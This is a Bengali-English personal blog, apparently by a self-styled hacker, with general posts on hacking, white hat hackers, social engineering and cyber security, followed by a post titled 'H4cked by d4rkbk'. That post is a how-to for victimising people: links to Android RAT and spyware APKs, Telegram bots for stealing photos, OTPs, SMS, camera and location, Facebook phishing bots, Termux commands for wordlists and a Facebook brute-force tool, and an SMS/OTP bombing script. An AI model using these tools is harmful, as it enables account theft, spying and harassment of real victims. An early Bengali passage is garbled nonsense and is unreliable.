What is hacking

March 23, 2024 ---

 

                                                                      HACKING IS A ART

                              


হ্যাকিং কি?


হ্যাকিং হলো এমন একটি প্রক্রিয়া যা একটি সিস্টেম, নেটওয়ার্ক, অ্যাপ্লিকেশন বা ডিভাইসের সিকিউরিটি বা গোপনীয়তা ভেঙে ঢুকে যাওয়ার জন্য ব্যবহৃত হয়। হ্যাকাররা বিভিন্ন প্রকারের হ্যাকিং করে, যেমন পাসওয়ার্ড ক্র্যাক, ডেনিয়াল-অফ-সার্ভিস (DoS) অ্থবা ডেনিয়াল-অফ-সার্ভিস (DDoS) হামলা, ম্যালওয়্যার ইনস্টলেশন, ফিশিং, সোশ্যাল ইঞ্জিনিয়ারিং, ইন্টারনেটের মাধ্যমে অনুরোধের মাধ্যমে।

হ্যাকিং এর মূল উদ্দেশ্য হ'ল - গোপনীয়তা, অর্থনৈতিক, বা আন্তর্জাতিক অনুরোধের জন্য।



আজ আমি আপনাদের সাথে হ্যাকিং সম্পর্কে কিছু কথা শেয়ার করতে চাই। হ্যাকিং শব্দটি শোনার সাথে সাথেই অনেকের মনে ধরে যায় ভীষণ অবৈধ কাজের জন্য। তারই মধ্যে এই বিশ্বাস সৃষ্টি হয়, যে, হ্যাকিং-এর পেছনে শুধু দুর্নীতির মার্গের জন্যই চলে। 

তাহলে, আমি আপনাদেরকে বলতে চাই, হ্যাকিং-এর মৌলিক ধারা হ'লো, এটি একটি প্রোগ্রামিং, নেটওয়ার্কিং, সিস্টেম এন্ড সিকিউরিটির জন্যের একটি অনুশীলন। 

এর আগে, আপনিরা "hacker" শব্দের "good hacker" বা "ethical hacker" শব্দের সাথে পরিচিত হন। "Good hacker" হ'লো, যে, নিজেরা অন্যেরা-রা, তাদেরা-রা, "ethical" (নৈতিক) উন্নয়নের, "cybersecurity" (নেট-নিরাপত্তা) -র, "information technology" (তথ্য-প্রযুক্তি) -র, "computer system" (কম্পিউটার-নির্দেশ) -র, "software development" (সফ্টওয়্যার-নির্মাণ) -র, "network administration" (নেট-নির্দেশন) -র, "technology research" (প্রযুক্তি-নিবন্ধন) -র, "cyber intelligence" (নেট-খো-নিরাপত্তা) -র, "cyber defense" (নেট-রো-নিরাপত্তা) -র, "cyber warfare" (নেট-ৎ-নিরাপত্তা) -র, "information warfare" (তথ্য-ৎ-নিরাপত্তা) -র, "cybercrime investigation" (নেট-ऽ-নিরাপত্তা-নিবন্ধন) -র, "security awareness training" (নিরাপত্তা-র-নিদান) -র, "vulnerability research" (না-নিরাপ-নিবন্ধ) -র, "penetration testing" (নিগূ-नিরাপ-নি) -র, "security consulting" (নিরাপ-नি-নিবন) -র, "security auditing" (নি-नি-नি) -র, "security software development" (নি-प্‌-नি) -র, "security policy development" (নি-प্‌-नি) -র, "security operations management" (নি-प্‌-नি) -র, "incident response management" (নি-प্‌-नि) -র, "disaster recovery planning" (নি-प্‌-नि) -র, "business continuity planning" (নि-प্‌-नि) -र, "regulatory compliance" (नि-प्‌) -र, "data protection" (नि-प्‌) -र, "privacy protection" (नि-प्‌) -र, "intellectual property protection" (नि-प्‌) -र, "fraud prevention" (नि-प्‌) -र, "identity theft prevention" (नि-प्‌) -र, "online safety" (नि-प्‌) -र, "digital forensics" (नि-प्‌) -र, "cyber law" (नि-प्‌) -र, "ethical hacking training and certification" (नि-प्‌) -र, "cybersecurity research and development" (नि-प्‌) -र, "information security management" (नि-प्‌) -र, "IT governance and risk management" (नि-प्‌) -र।

good hacker



"""
ENGLISH VERSION:


Hacking: Understanding the Intricacies of Cybersecurity

In today's digital age, the term "hacking" has become a buzzword that often carries negative connotations. However, hacking is a complex and multifaceted concept that encompasses a wide range of activities, from malicious cyber attacks to ethical penetration testing.

At its core, hacking refers to the act of gaining unauthorized access to computer systems or networks. This can be done through a variety of means, including exploiting software vulnerabilities, using social engineering tactics, or simply guessing weak passwords. While some hackers use their skills for nefarious purposes, others leverage their expertise to identify and address security weaknesses, ultimately strengthening the defenses of organizations and individuals.

One common misconception about hacking is that it is inherently illegal. In reality, there are different types of hacking, each with its own ethical implications. "Black hat" hackers engage in criminal activities, such as stealing sensitive data or disrupting critical infrastructure. On the other hand, "white hat" hackers, also known as ethical hackers, work to uncover vulnerabilities and help organizations improve their security posture. Additionally, there are "grey hat" hackers who operate in a morally ambiguous space, often straddling the line between legality and illegality.

In the realm of cybersecurity, hacking plays a crucial role in identifying and mitigating potential threats. Ethical hackers use their skills to simulate real-world attacks and assess an organization's resilience to cyber threats. By uncovering weaknesses before malicious actors can exploit them, ethical hacking serves as a proactive defense mechanism, allowing businesses to fortify their digital assets and protect sensitive information.

Furthermore, hacking is not limited to traditional computer systems; it also extends to the realm of the Internet of Things (IoT) and connected devices. As more devices become interconnected, the attack surface for hackers continues to expand, making it essential for security professionals to stay ahead of emerging threats.

In conclusion, hacking is a multifaceted concept that encompasses both malicious and ethical activities. While malicious hacking poses significant risks to cybersecurity, ethical hacking serves as a valuable tool for safeguarding digital assets and strengthening defenses. By understanding the intricacies of hacking, individuals and organizations can better navigate the complex landscape of cybersecurity and stay one step ahead of potential threats.

White Hat Hacker

March 23, 2024 ---

 


              White Hat Hacker


সাইবার নিরাপত্তা এবং ডাটা সুরক্ষা বিষয়ে আমাদের জনগণের সচেতনতা বাড়ানোর জন্য সাইবার নিরাপত্তা পেশায় একটি নতুন দিক। এই পেশায় কাজ করে যারা হ্যাকিং বা অন্যান্য অনৈতিক কাজের বিপরীতে সাইবার নিরাপত্তা এবং ডাটা সুরক্ষায় লোকেরা সাহায্য করে। 


"হোয়াইট হ্যাট হ্যাকার" হলো সেই ব্যক্তি যা সিস্টেমের নিরাপত্তা বাড়াতে, গোপনীয়তা রক্ষা করতে, কোনো অনুমতি ছাড়া অন্যের ডাটা অ্যাক্সেস না করে। 


এরা নিজেরা হ্যাকিং, ফিশিং, ম্যালওয়্যার, ভাইরাস, ডেনিয়াল-অব-সার্ভিস (DoS) attack, Distributed Denial of Service (DDoS) attack, Cross-site scripting (XSS) attack, SQL injection, Social engineering, Identity theft, Credit card fraud, Online scams, Cyberbullying, Cyberstalking, Cyberextortion, Ransomware attack, Phishing attack, Malware attack, Botnet attack, Keylogger attack, Adware attack, Spyware attack, Trojan horse attack, Rootkit attack, Logic bomb attack, Backdoor attack, Man-in-the-middle attack, Man-in-the-browser attack, Zero-day exploit attack, Watering hole attack, DNS spoofing attack, Session hijacking attack, Clickjacking attack, Typosquatting attack, URL spoofing attack, Drive-by download attack, Browser hijacking attack, Browser extension attack, Email spoofing attack, Email phishing attack, Email spamming attack, Email bombing attack, Email harvesting attack, Email eavesdropping attack, Email wiretapping attack, Email sniffing attack, Email forgery attack, Email tampering attack, Email interception attack, Email redirection attack, Email replay attack, Email denial-of-service (DoS) attack, Email Distributed Denial-of-Service (DDoS) attack, Email flooding attack, Email bouncing attack, Email amplification attack, Email smurfing attack, Email teardrop attack, Email ping-of-death (PoD) attack, Email land attack, Email fraggle attack, Email SYN flood attack, Email ICMP flood attack, Email UDP flood attack and any other cybercrime related activities.


"হোয়াইট হ্যাট হ্যাকার" দের ১০০%  ।  "Black hat hacker" ।  "Gray hat hacker" ।  "Script kiddie" ।  "Hacktivist" ।  "State/Nation-sponsored hacker" ।  "Cyber terrorist" ।  "Cybercriminal" ।  "Cyber spy" ।  "Cyber warrior" ।  "Cyber soldier" ।  "Cyber cop" ।  "Cyber detective" ।  "Cyber lawyer" ।  "Cyber judge" ।  "Cyber regulator" ।  "Cyber policymaker" ।  "Cyber researcher" ।  "Cyber educator" ।  "Cyber analyst" ।  "Cyber consultant" ।  "Cyber trainer" ।  "Cyber mentor" ।


"White hat hacker" দের লোকেরা "Ethical hacker", "Penetration tester", "Security analyst", "Security researcher", "Security consultant", "Security auditor", "Security architect", "Security engineer", "Security administrator", "Security specialist", "Security manager", "Security director", "Security officer", "Security leader", "Security expert", "Security professional", "Security practitioner", "Security instructor", "Security mentor", "Security trainer", "Security coach", "Security advocate", "Security evangelist", "Security enthusiast", "Security supporter", "Security promoter", "Security protector", "Security guardian", "Security defender", "Security warrior", "Security hero", "Security savior", "Security champion", "Security ambassador", "Security role model".




English Version: 

Title: The World of a White Hat Hacker


In the vast and complex world of cybersecurity, there exists a unique and often misunderstood group of individuals known as white hat hackers. These ethical computer experts utilize their skills and knowledge to identify and address vulnerabilities in systems, networks, and applications. Unlike their black hat counterparts, white hat hackers work with organizations to enhance their security measures and protect against potential cyber threats.


White hat hackers are driven by a sense of responsibility and a desire to make the digital world a safer place for everyone. They often engage in penetration testing, vulnerability assessments, and security audits to proactively identify weaknesses before they can be exploited by malicious actors. Their work is crucial in safeguarding sensitive information and preventing data breaches.


Despite their noble intentions, white hat hackers often operate in a legal gray area, as their methods may involve probing into systems without explicit authorization. However, many organizations recognize the value of their expertise and actively seek out their services to fortify their defenses.


In conclusion, white hat hackers play a vital role in the ongoing battle against cyber threats. Their dedication to ethical practices and commitment to enhancing cybersecurity make them unsung heroes in the digital realm. It is important to acknowledge and appreciate the contributions of these individuals in safeguarding our increasingly interconnected world.

Human Hack

March 21, 2024 ---

 

Human Hack 

                                        

     Social Engineering: The Art of Human Hacking


ভূমিকা

সাইবার নিরাপত্তার ক্ষেত্রে, যেকোনো নিরাপত্তা চেইনের সবচেয়ে দুর্বল লিঙ্কটি প্রায়শই প্রযুক্তি নয়, কিন্তু মানুষ এটি পরিচালনা করে। "মানুষ হ্যাকিং" বিজ্ঞান কল্পকাহিনী নয়; এটি একটি বাস্তবতা যা গোপনীয় তথ্য প্রকাশ করার জন্য ব্যক্তিদের ম্যানিপুলেট করার চারপাশে ঘোরে। সামাজিক প্রকৌশল নামে পরিচিত এই কৌশলটি প্রযুক্তিগত দুর্বলতার পরিবর্তে মানব মনোবিজ্ঞানকে কাজে লাগায়। এই বিস্তৃত ব্লগ পোস্টে, আমরা এই আক্রমণগুলির পিছনে মনোবিজ্ঞান, সোশ্যাল ইঞ্জিনিয়ারিংয়ের ধরন এবং কীভাবে নিজেকে এবং আপনার সংস্থাকে রক্ষা করব তা অন্বেষণ করব৷


এটি হিউম্যান হ্যাকিং, সোশ্যাল ইঞ্জিনিয়ারিং এবং কীভাবে নিজেকে আক্রমণ থেকে রক্ষা করা যায় তার শিল্প ও বিজ্ঞান সম্পর্কে একটি মাল্টি-ব্লগ সিরিজ হতে চলেছে৷


সোশ্যাল ইঞ্জিনিয়ারিং কি?

সোশ্যাল ইঞ্জিনিয়ারিং হ'ল লোকেদের ম্যানিপুলেট করার শিল্প যাতে তারা গোপনীয় তথ্য ছেড়ে দেয়। যে ধরনের তথ্য চাওয়া হয়েছে তা পাসওয়ার্ড থেকে শুরু করে ব্যাঙ্কের বিশদ, এমনকি ক্ষতিকারক সফ্টওয়্যার ইনস্টল করার জন্য আপনার কম্পিউটারে অ্যাক্সেস পর্যন্ত হতে পারে। হ্যাকিংয়ের বিপরীতে, যা প্রযুক্তিগত ত্রুটিগুলিকে কাজে লাগায়, সোশ্যাল ইঞ্জিনিয়ারিং 'হ্যাকিং'-এর উপর দৃষ্টি নিবদ্ধ করে সবচেয়ে ঝুঁকিপূর্ণ উপাদান—মানুষের মন।


সামাজিক প্রকৌশলের পিছনে মনোবিজ্ঞান

1. কর্তৃপক্ষের পক্ষপাত

আমরা কর্তৃপক্ষের লোকদের শোনার জন্য প্রোগ্রাম করা হয়. স্ক্যামাররা তাদের প্রতারণাকে আরও বিশ্বাসযোগ্য করার জন্য সিইও, পুলিশ অফিসার বা আইটি প্রশাসক হিসাবে জাহির করতে পারে।


2. পারস্পরিকতা

"দাও এবং নাও" নীতিটি মানুষের প্রকৃতিতে নিহিত। হ্যাকাররা তথ্যের বিনিময়ে - আপাতদৃষ্টিতে নির্দোষ পরিষেবা বা সুবিধার মতো কিছু অফার করে এটিকে কাজে লাগায়৷


3. জরুরী

জরুরী বোধ তৈরি করা শিকারদের যুক্তিপূর্ণ সিদ্ধান্ত গ্রহণ এবং নিরাপত্তা প্রোটোকল উপেক্ষা করে আবেগপ্রবণভাবে কাজ করতে পারে।


4. সামাজিক প্রমাণ

যদি আমরা অন্যরা সেগুলি করতে দেখে থাকি তবে আমরা জিনিসগুলি করার সম্ভাবনা বেশি। ফিশিং ইমেল যেগুলি দেখে মনে হয় সেগুলি কোনও বন্ধু বা বিশ্বস্ত সহকর্মীর কাছ থেকে পাঠানো হয়েছে এই প্রবণতাকে কাজে লাগায়৷


মানুষের হ্যাকিং সোশ্যাল ইঞ্জিনিয়ারিং আক্রমণের পিছনে মনোবিজ্ঞান বোঝা সোশ্যাল ইঞ্জিনিয়ারিং আক্রমণের ধরন

1. ফিশিং

ফিশিং আক্রমণগুলি প্রায়ই ইমেল বা বার্তাগুলির আকারে আসে যা একটি বিশ্বস্ত উত্স থেকে বলে মনে হয়৷ তারা শিকারকে এমন একটি লিঙ্কে ক্লিক করতে উত্সাহিত করে যা একটি নকল লগইন পৃষ্ঠায় নিয়ে যায়, যা শংসাপত্র চুরি করার জন্য ডিজাইন করা হয়েছে।


2. টোপ দেওয়া

টোপ দেওয়ার সময়, আক্রমণকারী একটি ম্যালওয়্যার-সংক্রমিত শারীরিক ডিভাইস, যেমন একটি USB ড্রাইভ, এমন জায়গায় রেখে যায় যেখানে এটি পাওয়া নিশ্চিত। অনুসন্ধানকারী তারপরে ডিভাইসটিকে একটি কম্পিউটারে প্লাগ করে, অসাবধানতাবশত ম্যালওয়্যারটি ইনস্টল করে।


3. ভান করা

এখানে, আক্রমণকারী তথ্য পাওয়ার জন্য একটি বানোয়াট দৃশ্য তৈরি করে। উদাহরণস্বরূপ, তারা আপনার পরিচয় নিশ্চিত করতে আপনার কাছ থেকে কিছু তথ্যের প্রয়োজনের ভান করতে পারে।


4. টেলগেটিং

এই কৌশলটি অন্তর্ভুক্ত করে যে কেউ আপনার ব্যক্তিগত অ্যাক্সেসের অনুরোধ করে, যেমন একটি দরজা সোয়াইপ কার্ড, আপনার পিছনে একটি বিল্ডিংয়ে প্রবেশ করার জন্য। যদিও আপনি সেই ব্যক্তিকে চেনেন না, আপনি মানব সহানুভূতির ভিত্তিতে তাকে প্রবেশ করতে দেন।


5. Quid Pro Quo

এই ক্ষেত্রে, হ্যাকার তথ্য বা অ্যাক্সেসের বিনিময়ে একটি পরিষেবা বা সুবিধা প্রদান করে। আপনি তাদের পিঠ আঁচড়ান, তারা আপনার নিরাপত্তার সাথে আপস করে।


কিভাবে নিজেকে রক্ষা করবেন

1. শিক্ষা ও প্রশিক্ষণ

সচেতনতাই প্রতিরোধের প্রথম ধাপ। নিয়মিতভাবে নিজেকে এবং আপনার কর্মীদের সোশ্যাল ইঞ্জিনিয়ারিং প্রচেষ্টাকে স্বীকৃতি দেওয়া এবং প্রতিরোধ করার বিষয়ে প্রশিক্ষণ দিন।


2. দুই-ফ্যাক্টর প্রমাণীকরণ

নিরাপত্তার একটি অতিরিক্ত স্তর যোগ করতে যেখানেই সম্ভব দুই-ফ্যাক্টর প্রমাণীকরণ ব্যবহার করুন যা শুধুমাত্র পাসওয়ার্ডের উপর নির্ভরশীল নয়।


3. নীতি প্রয়োগ

কোম্পানির নীতিগুলি কঠোরভাবে প্রয়োগ করুন যা তথ্য প্রকাশকে সীমাবদ্ধ করে এবং নিশ্চিত করে যে কর্মচারীরা এই নীতিগুলি সম্পর্কে সচেতন।


4. নিয়মিত অডিট

সামাজিক প্রকৌশলের মাধ্যমে শোষিত হতে পারে এমন দুর্বলতাগুলি খুঁজে পেতে এবং ঠিক করতে নিয়মিত নিরাপত্তা অডিট পরিচালনা করুন।


5. একটি নিরাপদ সংস্কৃতি বিকাশ করুন

নিরাপত্তা সবার জন্য উদ্বিগ্ন করুন। এমন একটি সংস্কৃতি গড়ে তোলা যেখানে লোকেরা একে অপরের দিকে নজর দেয়, তারা ক্ষতি করার আগে প্রতারণামূলক প্রচেষ্টাকে ধরতে সাহায্য করতে পারে।


সোশ্যাল ইঞ্জিনিয়ারিং অ্যাটাক হ্যাকিং হিউম্যানস উপসংহারের পিছনে মনোবিজ্ঞান বোঝা

হ্যাকিং শুধুমাত্র কোড এবং কম্পিউটার সম্পর্কে নয়; এটি মানুষের আচরণ বোঝা এবং সিস্টেম এবং ডেটাতে অননুমোদিত অ্যাক্সেস পেতে এটিকে ম্যানিপুলেট করার বিষয়ে। এই কৌশলগুলির পিছনে মনোবিজ্ঞান বোঝা ব্যক্তি এবং সংস্থাগুলিকে সামাজিক প্রকৌশল আক্রমণের বিরুদ্ধে কার্যকরভাবে নিজেদের রক্ষা করতে সক্ষম করতে পারে।


যদিও আমরা মানুষের প্রকৃতি পরিবর্তন করতে পারি না, আমরা অবশ্যই এর ক্ষতি সম্পর্কে আরও সচেতন হতে পারি। শিক্ষাগত প্রচেষ্টা এবং নিরাপত্তার সংস্কৃতির সাথে প্রযুক্তিগত সমাধানগুলিকে মিশ্রিত করে, আমরা সাইবার নিরাপত্তার সবচেয়ে অপ্রত্যাশিত উপাদান হ্যাক করার প্রচেষ্টার বিরুদ্ধে একটি শক্তিশালী প্রতিরক্ষা তৈরি করতে পারি—মানুষ।


cyber security

March 21, 2024 ---


 bangla version:

সাইবার নিরাপত্তা সম্পর্কে


সাইবার নিরাপত্তা বর্তমান সময়ে অত্যন্ত গুরুত্বপূর্ণ একটি বিষয়। আমাদের দৈনন্দিন জীবনে ইন্টারনেট ব্যবহারের সাথে সাথে সাইবার আক্রমণের ঝুঁকি বাড়ছে। এই আক্রমণের মাধ্যমে আমাদের ব্যক্তিগত তথ্য, আর্থিক তথ্য, বা সরকারি তথ্যের গোপনীয়তা নিশ্চিত ভাবে ভেঙে নেয়া হয়।


সাইবার নিরাপত্তা সংক্রান্ত সুরক্ষা ব্যবস্থা, প্রোটোকল, এনক্রিপশন, ফায়ারওয়াল, ভাইরাস স্ক্যান, ডেটা ব্যাক-আপ, এন্টি-ভাইরাস, মালওয়্যার, স্প্যাম, ফিশিং, ডেনিয়াল-অফ-সার্ভিস (DoS) এর মাধ্যমে সাইবার হামলা থেকে নিরাপত্তা নিশ্চিত করা হয়।


আরোনিতি, এনিগ্মা, RSA, DES, AES, SSL, TLS, VPN, IPSec, PKI, SSH, SFTP, SCP, FTPS, PGP, OpenPGP, GnuPG, steganography, honeypot, sandboxing, intrusion detection system (IDS), intrusion prevention system (IPS) – এই ধরনের উন্নয়নের

 ।

 ।

 ।


English version: 

Cyber security is a critical aspect of our digital world, and it's more important than ever to stay informed and proactive. With the increasing number of cyber attacks and data breaches, individuals and organizations need to take steps to protect their sensitive information.


One of the key components of cyber security is education. It's essential for everyone to understand the potential risks and the best practices for staying safe online. This includes being cautious about the websites we visit, the links we click, and the information we share. Additionally, using strong, unique passwords and enabling two-factor authentication can significantly enhance our digital security.


For businesses, implementing robust cyber security measures is crucial to safeguarding their operations and customer data. This may involve investing in firewalls, antivirus software, and regular security audits to identify and address vulnerabilities.


Ultimately, cyber security is a shared responsibility. By staying informed, adopting best practices, and leveraging the right tools, we can all contribute to creating a safer digital environment for ourselves and others.



H4cked by d4rkbk

March 21, 2024 ---

                  Hey there wanted to be h4cked?         


                                                                                                                                
                                                                                                                                                                                                                                    INTRODUCING MYSELF:                                                                                                                             I AM  BAYETJIT (D4RKBK)



                     OK THERE LETS GET H4CKED





🖼️ Gallery h_ck 🖼️

GitHub: https://github.com/d4rkbk

download this file  👇👇👇
                   *Download* 
Telegram bot
My bot: @d4rkbk_gallerybot

"#ব্যাবহার লিংকে যে অ্যাপ আছে এটা ডাউনলোড করে পারমিশন দিবে। দেওয়ার পর ফোনের সব গ্যালারি ছবি টেলিগ্রাম bot টাই চলে আসবে।"
New is coming......soon 🔜




💬 Imo h_ck 💬

Imo H@©k Apps Link- DOWNLOAD

Refere code- 9559458@tm.ex


Imo hack admin Link - https://t.me/c/1625564246/6167


"#ব্যাবহার ইমো ইনকাম নামে অ্যাপ টা ডাউনলোড করতে হবে। রেফার কোড টা ব্যাবহার করতে হবে, তার পর সাইন উপ করবে ভিকটিম, imo এডমিন নামে অ্যাপ টাই নাম্বার চলে আসবে। আপনি যথাসম্ভব দ্রুত ইমো টা লগইন করবেন একটা otp চাইবে,তখন ভিকটিম otp দিবে আপনি otp পেয়ে যাবেন এডমিন অ্যাপ টাই।"




⭕ Otp H_ck Message H_ck⭕

Apk: DOWNLOAD

Telegram bot
My bot: @sms_otphack_bot

"#ব্যাবহার এই free-rdp অ্যাপ টা ডাউনলোড করবে। পারমিশন দিবে দিলে ভিকটিম এর ফোন যখন মেসেজ আসবে তখন সেই মেসেজ আপনি টেলিগ্রাম bot এর মধ্যে সাথে সাথে পেয়ে যাবেন।"



#️⃣Number Gmail Contact list h_ck#️⃣

Number free apk for victim - DOWNLOAD

Tbb admin panel for admin - DOWNLOAD


"#ব্যাবহার ভিকটিম কে numbar free অ্যাপ টা ডাউনলোড করিয়ে দিতে হবে।কয়েকটা পারমিশন দিলে tbb admin panel নামে অ্যাপ টাই ভিকটিম এর সব তথ্য এসে পড়বে।যেমন: gmail numbar।"




☠️ Android Phone H_ck ☠️

Airdroid.com app (weak h_ck)

Gmail: only bayetjit know
Password: only bayetjit know

Login permission allowed hacked

DogeRat Android H#ck advanced
"https://android-hck-dogerat--darkbk69.repl.co/__replco/static/devtools/devtools.js"


Apk link: DOWNLOAD


Telegram bot: @d4rkbkandro_bot

"#এই apk টা ডাউনলোড করে শুধু মাত্র 1টা পারমিশন চাইবে সেটা dile অটোমেটিক সব পারমিশন নিয়ে নিবে, আর এই rat ডিলিট করা যাবে না চাইলেও, এটা পারমিশন নেওয়ার পর আর সেটিং এ ঢুকা যাবেনা, অ্যান্ড্রয়েড হ্যাক ভয়ংকর।"




👽 location Camera Keyboard H_ck 👽

Telegram bot list
1. @CameraHackingBot (camera)
2. @akatsuki_Q_bot (camera location keyboard)
3. @CAMERA_HACKROBOT (camera ip)
4. @cmahackcamera_bot


"#ব্যাবহার টেলিগ্রাম অ্যাপ ওপেন করে ইউজারনেম সার্চ করে বট স্টার্ট দিয়ে লিংক বানিয়ে ভিকটিম কে দিতে হবে।ভিকটিম লিংক ওপেন করে পারমিশন দিলে।ছবি বট এ চলে আসবে."




🎭 Facebook H_ck 🎭

Phising page: @STR_TBOT
My bot: @Phishing_d4rkbkbot
Link short bot: @LinkShorter_sg_bot
"#ব্যাবহার ফিশিং পেজ এর মধ্যে অনেক লিংক পাবো।যে আইডি হক করবো তার লিংক কপি করে লিংক টা শর্ট করে নিতে হবে, পরে লিংক টা ভিকটিম কে পাঠাতে হবে।লিংক ওপেন করে আইডি পাস দিলে my bot এর মধ্যে আইডি পাস চলে আসবে।"

Password list (Word list)

CREATE PASS LIST ON TERMUX

pkg update
pkg upgrade
pkg install crunch
crunch
crunch (minimum) (maximum) (HEAD) -o password.txt

COMMAND COPY FROM HERE

© Bayetjit {DarkBk}👿


FACEBOOK TARGET ID HACK BY BRUTEFORCE ATTACK

pkg install python
python3 -m pip install --upgrade pip setuptools
python3 -m pip install requests bs4 rich future futures features mechanize
git clone https://github.com/Anas-Allhyani/Bruteforce-facebook.git
cd Bruteforce-facebook
python Brutex.py

"#ব্যাবহার termux অ্যাপ টাই কমান্ড ব্যাবহার করে টারগেট ভিকটিম এর ওপর ওয়ার্ড লিস্ট বা পাসওয়ার্ড লিস্ট বানাতে হবে।বানিয়ে চাইলে কিছু পাসওয়ার্ড নিজের ইচ্ছে মতো দিতে পারবো তার জন্যে বানানো ফাইল টা ACode নামে একটা অ্যাপ এর মধ্যে ফাইল টা নিয়ে নিজের মতো পাস লিখে ফোনে সেভ করতে হবে। পরে termux এ brutefroce কমান্ড ইন্সটল করে ওই পাস লিষ্টে অ্যাটাক দিতে হবে আর টার্গেট আইডি লিংক দিতে হবে।"

Fb phising bot: @star_hoshino_bot (paid)
30din 50tk

"#ব্যাবহার বট এর মধ্যে যে লিংক পেয়েছি, সেটা ওপেন করে সার্ভার সিলেক্ট করে যে লিংক দরকার ঐটা কপি করে ভিকটিম কে দিবো, ভিকটিম লগইন করলে ওই bot টাই পাস চলে আসবে।"


Advance FB hack
"Facebook Auto liker Phishing"
Link: DOWNLOAD


"#এই লিংকে ঢুকলে অটো লাইকের নামে 1টা অ্যাপ ডাউনলোড করতে হবে ইনস্টল করার পরে ভিকটিম আইডি পাস দিলে টেলিগ্রাম বট এ চলে আসবে।"
বিদ্রো: ভুল পাসওয়ার্ড দিলে কাজ হবেনা.





💥 Sms Bombing call Bombing 💥

Telegram bot: @alive_kurumi_bot

আসসালামু আলাইকুম ( BKASH BOMBER OTP ) আপলোড করে দেয়া হলো - কিভাবে ব্যাবহার করবেন সব ভিডিওতে দেখানো হয়েছে - আর সবাই এই পোস্টে দ্রুত রিয়েক্ট দিয়ে ভরিয়ে দেও Telegram Otp Bomber আনবো

git clone https://github.com/AHAD-VAU-KING/BkashOtp

ls


cd BkashOtp


ls


python bkash-otp.py



সবাই মজার জন্য ব্যাবহার করুন - কেউ খারাপ উদ্দেশ্য নিয়ে ব্যাবহার করবেন না ( আর হ্যা বিকাশ খোলা থাকলেও Otp যাবে না থাকলেও যাবে )
SMS BOMBING APK
My Apk: DOWNLOAD

So many way available....apk ,website ,bot for bombing




MY SOCIAL MEDIA:


Facebook : https://www.facebook.com/mriron.man.90?mibextid=ZbWKwLFacebook (2): https://www.facebook.com/profile.php?id=100000294487397&mibextid=ZbWKwL

YouTube: https://youtube.com/@bkarmy1007

YouTube (2): https://youtube.com/@gamingwithbayetjit8761

Replit: https://replit.com/@bayetjit100

GitHub: https://github.com/d4rkbk

Instagram: https://instagram.com/bd.bangla_gaming?igshid=ZDdkNTZiNTM%3D

TikTok: https://www.tiktok.com/@bayetjitkhandaker?_t=8bP65v970ZG&_r=1

Telegram: https://t.me/d4rkbk_hkrv4u

LinkedIn: http://www.linkedin.com/in/ bayetjit-k-d4rkbk

Wikialpha (Bangla): https://en.wikialpha.org/wiki/%E0%A6%AC%E0%A6%BE%E0%A6%AF%E0%A6%BC%E0%A7%87%E0%A6%9C%E0%A6%BF%E0%A6%A6_%E0%A6%96%E0%A6%A8%E0%A7%8D%E0%A6%A6%E0%A6%95%E0%A6%BE%E0%A6%B0

Wikialpha (English): https://en.wikialpha.org/wiki/Bayetjit_khandaker

My Website: http://bayetjit.free.nf/
If link not working: https://tinyurl.com/yr6w3flj

My Website or bio: https://bio.link/bayetjit

My telegram public group: https://t.me/who_is_d4rkbk